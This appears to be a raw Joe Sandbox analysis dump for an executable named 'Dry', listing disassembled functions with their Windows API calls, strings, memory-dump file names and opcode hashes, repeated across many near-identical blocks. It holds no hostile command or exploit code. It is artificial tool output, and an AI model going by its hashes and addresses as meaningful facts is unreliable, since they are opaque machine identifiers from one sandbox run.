                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 554194645847C96AFF31966488443A5BEF0EF21348F0880D9D5C65B5C2EBA49FC8D7A3
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                    • Opcode ID: 778e1fcec4f52e7c3f65a3ffb431906996fee0b7b5cfbe5d4d6ec3021707ac68
                                                                                                                                                                                                                                                                                    • Instruction ID: 136b6ae470b5da2e3683caef34b147b1a1e4ad096ee440e0899ae48f3210861f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 778e1fcec4f52e7c3f65a3ffb431906996fee0b7b5cfbe5d4d6ec3021707ac68
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5951C332A041169BCF14DF6CC9909BEB7E9FF65360B2042A9E826E72C4DB39DD41C790
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32 ref: 00B641D1
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B641DC
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00B80B44,?), ref: 00B64236
                                                                                                                                                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 00B642A9
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B64341
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B64393
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                    • Opcode ID: afcbc12211b1c620d9a85a8e740f6c4fe418c58c2d11cffd561fa7a304fbb1fc
                                                                                                                                                                                                                                                                                    • Instruction ID: 9d443b408b7ec7ae64c0319e3560252280c5ce4cc15e02a387b1215c7ead4752
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afcbc12211b1c620d9a85a8e740f6c4fe418c58c2d11cffd561fa7a304fbb1fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5061B171608B01DFC310DF64D888F6ABBE4EF49714F104999F9859B2A1DB74ED48CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00B58C9C
                                                                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B58CAC
                                                                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B58CB8
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B58D55
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58D69
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58D9B
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B58DD1
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58DDA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                    • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                    • Opcode ID: 970dfe9a7a68487d46eb23011b73f050db596a172fe37e933946084277657971
                                                                                                                                                                                                                                                                                    • Instruction ID: 4395fa2a843f0d7b50e527009e4e14599eef5cd7c54d67f03841dfd1efd50fc5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 970dfe9a7a68487d46eb23011b73f050db596a172fe37e933946084277657971
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4615B725043459FCB10EF60C844AAEB7F8FF99310F0449ADF99997291DB31EA49CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMenu.USER32 ref: 00B74715
                                                                                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00B74724
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B747AC
                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00B747C0
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00B747CA
                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B747F7
                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00B747FF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                    • String ID: 0$F
                                                                                                                                                                                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                    • Opcode ID: d1a3941b0a7895da02a53e29ef0529ec3440536b0b4c7c1998936ddcc2d24f9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 1c621edf5eb89b7e60ff57f7c0a9cbf53f5e1644cfc180eadbdc612553456d76
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1a3941b0a7895da02a53e29ef0529ec3440536b0b4c7c1998936ddcc2d24f9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03419A74A01209EFDB14CF64D884EAA7BF5FF09315F148068FA59A7360CB70AD10CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B428B1
                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00B428BC
                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00B428D8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B428DB
                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00B428E4
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00B428F8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B428FB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: 79ea2331d99b201785ce1e2e1ca6b8e8403c540010e2d1d4041fc46906007a3b
                                                                                                                                                                                                                                                                                    • Instruction ID: 350668416f201c599885f19ffac48aad9666731f11cb584b1aec7ee8dc5e5dbb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79ea2331d99b201785ce1e2e1ca6b8e8403c540010e2d1d4041fc46906007a3b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0821F974D00118BFCF05AFA4CC85EEEBBB4EF05350F400196F961A72A1DB754958EB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00B42990
                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00B4299B
                                                                                                                                                                                                                                                                                    • GetParent.USER32 ref: 00B429B7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B429BA
                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00B429C3
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00B429D7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B429DA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: eb74f40978c6bd2948f43a04da87f5120410b403418dcbe3690925cfe8785441
                                                                                                                                                                                                                                                                                    • Instruction ID: fb5dbf8e94bc0e0a0674a1eadbcc4a41821e601a4b429c11b9e14e5903f50b21
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb74f40978c6bd2948f43a04da87f5120410b403418dcbe3690925cfe8785441
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A821F375E00218BBCF05AFA4CC86EEEBBB8EF05340F404096B951A71A1DB758958EB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B74539
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B7453C
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B74563
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B74586
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B745FE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B74648
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B74663
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B7467E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B74692
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B746AF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 501355cb2d39eef5a8872a352bb54129503a882b23c585a8daba43976bcb9c43
                                                                                                                                                                                                                                                                                    • Instruction ID: 40ff1e0456b1923614227d17bcb6def7d7f6bfa19ea30187bde7a2646457f983
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 501355cb2d39eef5a8872a352bb54129503a882b23c585a8daba43976bcb9c43
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33616B75A00208AFDB11DFA8CC85EEE77F8EF09710F1041A9FA19E72A1D7B4A945DB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B4BB18
                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB2C
                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00B4BB33
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB42
                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B4BB54
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB6D
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB7F
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BBC4
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BBD9
                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BBE4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4a0c5d6c31f70808330e343f6a99c6c406e8eb83e52c278b54b8c34a02d37666
                                                                                                                                                                                                                                                                                    • Instruction ID: 1cd858f38db1048d390a6b31214511e66fb47e6e05cce2347c293c9eb5f479db
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0c5d6c31f70808330e343f6a99c6c406e8eb83e52c278b54b8c34a02d37666
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC318C72A04604BFDB11AF24DC88F6977F9FF49352F504145FB0A971A4DBB4DA809B20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13007
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13013
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1301E
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13029
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13034
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1303F
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1304A
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13055
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13060
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1306E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6ca3c6b4cd78dd2973a4e3eb549f82e43367f63928f4a59aed3a2dd842ef7156
                                                                                                                                                                                                                                                                                    • Instruction ID: ec3c1a174ef9ed7dd3ee1466bf64a3a62b39cebe996e09b881d6c34eb39ce6d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca3c6b4cd78dd2973a4e3eb549f82e43367f63928f4a59aed3a2dd842ef7156
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 841142B6510108AFCB05EF94D942DDD3BE5EF09350BD145E5FA089B222DA32EBA19B90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AE2AF9
                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00AE2B98
                                                                                                                                                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00AE2D7D
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B23A1B
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B23A80
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B23AAD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                    • String ID: close all
                                                                                                                                                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                    • Opcode ID: 363b7799ec531a06d9a45867edd2604acdfe04c69de79b81c10d8f335e92db06
                                                                                                                                                                                                                                                                                    • Instruction ID: 85b4cf137526cac8293f77068c7c86c89b2bc7a75cc475c84fd0b5c0a0f057e9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 363b7799ec531a06d9a45867edd2604acdfe04c69de79b81c10d8f335e92db06
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D156716012628FCB29EF15D989B69F7F4EF05B50F1042EDE94AAB261CB31AD52CF40
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B589F2
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58A06
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B58A30
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B58A4A
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58A5C
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B58AA5
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B58AF5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
